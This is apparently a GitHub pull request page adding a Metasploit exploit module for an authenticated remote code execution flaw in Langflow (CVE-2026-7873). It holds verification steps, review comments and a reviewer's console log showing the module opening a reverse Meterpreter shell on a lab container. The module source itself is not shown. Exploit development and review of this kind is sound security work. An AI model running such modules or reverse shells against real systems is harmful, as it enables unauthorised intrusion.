Skip to content

ENH: Exploit module for Langflow authenticated Remote Code Execution vulnerability CVE-2026-7873 - #21877

Open
rmhowe425 wants to merge 6 commits into
rapid7:masterfrom
rmhowe425:dev/cve-2026-7873
Open

rmhowe425 wants to merge 6 commits into
rapid7:masterfrom
rmhowe425:dev/cve-2026-7873

Conversation

@rmhowe425

Copy link
Copy Markdown
Contributor

Description

This pull request adds a new exploit module that detects and exploits an authenticated remote code execution vulnerability impacting Langflow versions 1.0.0 through 1.10.0

Related Issue:
Fixes #21876

Breaking Changes

None

Reviewer Notes

Verification Steps

  1. docker pull and docker run langflow, per documentation
  2. Start msfconsole
  3. Do: use exploit/multi/http/langflow_unauth_rce_cve_2026_7873
  4. Do: set rhosts=<rhost> username=<username> password=<password>
  5. Do: exploit
  6. You should get a meterpreter session

Test Evidence

image

Environment

Field Details
Operating System Ubuntu 22.04
Target Software/Hardware langflow 1.8.4
Docker Image / Vagrant Setup langflowai/langflow:1.8.4

AI Usage Disclosure

None

Pre-Submission Checklist

  • Included a corresponding documentation markdown file in documentation/modules (new modules only)
  • No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
  • Tested on the target environment specified in the Environment section above
  • Included RSpec tests for library changes (encouraged for lib/ changes)
  • Read the CONTRIBUTING.md and module acceptance guidelines

@rmhowe425

Copy link
Copy Markdown
Contributor Author

@jheysel-r7 Looks like this PR was approved? Is it good to go?

@jheysel-r7

jheysel-r7 commented Sep 21, 2026 •

Copy link
Copy Markdown
Contributor

Hey @rmhowe425 - while we appreciate @Zdycomp's review, PR's need to be approved by an official member on the Metasploit-Framework commiter's list before they can be landed. I'll try and take a look today - hold tight

@jheysel-r7 jheysel-r7 self-assigned this Sep 21, 2026
@jheysel-r7 jheysel-r7 added module docs rn-modules release notes for new or majorly enhanced modules labels Sep 21, 2026

@jheysel-r7 jheysel-r7 left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for the module @rmhowe425.

Not a blocker for this PR however I've notice you've got a number of authenticated Langflow modules up that all query the api/v1/version endpoint. That could maybe be moved to a mixin with any other shared functionality if you think that might help!

Testing

msf exploit(multi/http/langflow_auth_rce_cve_2026_7873) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
smsf exploit(multi/http/langflow_auth_rce_cve_2026_7873) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf exploit(multi/http/langflow_auth_rce_cve_2026_7873) > options

Module options (exploit/multi/http/langflow_auth_rce_cve_2026_7873):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   PASSWORD   MetasploitTest!21877  yes       LANGFLOW PASSWORD
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
   RHOSTS     127.0.0.1             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      7860                  yes       The target port (TCP)
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                     yes       Base path of the Langflow application
   USERNAME   msfadmin              yes       LANGFLOW USERNAME
   VHOST                            no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Python payload



View the full module info with the info, or info -d command.

msf exploit(multi/http/langflow_auth_rce_cve_2026_7873) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 1.8.4 detected, which appears vulnerable.
[*] Sending stage (34540 bytes) to 172.16.199.1
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:60671) at 2026-10-01 14:21:25 -0700

meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer        : ee56b7d3f28c
OS              : Linux 7.0.12-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Aug 27 10:55:53 UTC 2026
Architecture    : x64
System Language : C
Meterpreter     : python/linux
meterpreter >

Arbitrary code is executed under the context of the backend Langflow process.
},
'Author' => [
'Richard Howe <rhowe425>'

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
'Richard Howe <rhowe425>'
'Richard Howe <rhowe425>', # Msf module
'n0k0' # Discovery

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Absolutely!

IMHO I think creating that mixin would be worthy of its own dedicated PR. I would be happy to create the GH Issue and jump on that.

Would you agree with this methodology?

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yea I think that would be the best idea, that way all the PR's that depend on the mixin aren't blocked. We can land all the Langflow modules as they are (after review) and then if you could put up a PR for the mixin and the appropriate refactoring all together, that would be great.

Copy link
Copy Markdown
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Sounds good!

@rmhowe425
rmhowe425 requested a review from jheysel-r7 October 1, 2026 22:22
@rmhowe425

Copy link
Copy Markdown
Contributor Author

@jheysel-r7 Ready for a second round of review!

```
sudo docker run -d \
--name langflow \
-p 192.168.1.30:7860:7860 \

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
-p 192.168.1.30:7860:7860 \
-p 7860:7860 \

Copilot AI left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Copilot review overview

🟡 Changes recommended

The module must handle malformed version responses without raising an exception; documentation also has noted inconsistencies.

Review effort: Lite
Findings: 1 Medium severity · 2 Low severity

Open (3)
What changed in this PR

Adds an authenticated Langflow RCE exploit module for CVE-2026-7873 and its documentation.

Changes:

  • Implements authentication, version checks, and payload execution.
  • Adds setup, verification, and usage documentation.
File Summary
modules/​exploits/​multi/​http/​langflow_auth_rce_cve_2026_7873.rb Authenticated Langflow RCE implementation
documentation/​modules/​exploit/​multi/​http/​langflow_auth_rce_cve_2026_7873.md Installation and usage documentation

💡 Add a code-review agent skill or configure MCP servers for context-aware, tailored reviews. Learn more in the docs.

Comment thread modules/exploits/multi/http/langflow_auth_rce_cve_2026_7873.rb Outdated
@@ -0,0 +1,63 @@
## Vulnerable Application
```
sudo docker run -d \
--name langflow \
-p 192.168.1.30:7860:7860 \
rmhowe425 and others added 2 commits October 2, 2026 14:45
Handle version parsing errors with a rescue block.

Co-authored-by: Copilot Autofix powered by AI <175728472+Copilot@users.noreply.github.com>
@rmhowe425
rmhowe425 requested a review from jheysel-r7 October 2, 2026 19:21
@rmhowe425

Copy link
Copy Markdown
Contributor Author

@jheysel-r7 ready for a third round of review!

This branch has not been deployed

No deployments
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

docs module rn-modules release notes for new or majorly enhanced modules

Projects

Status: What about Second Review?

Development

Successfully merging this pull request may close these issues.

ENH: Exploit module for Langflow authenticated Remote Code Execution vulnerability CVE-2026-7873

4 participants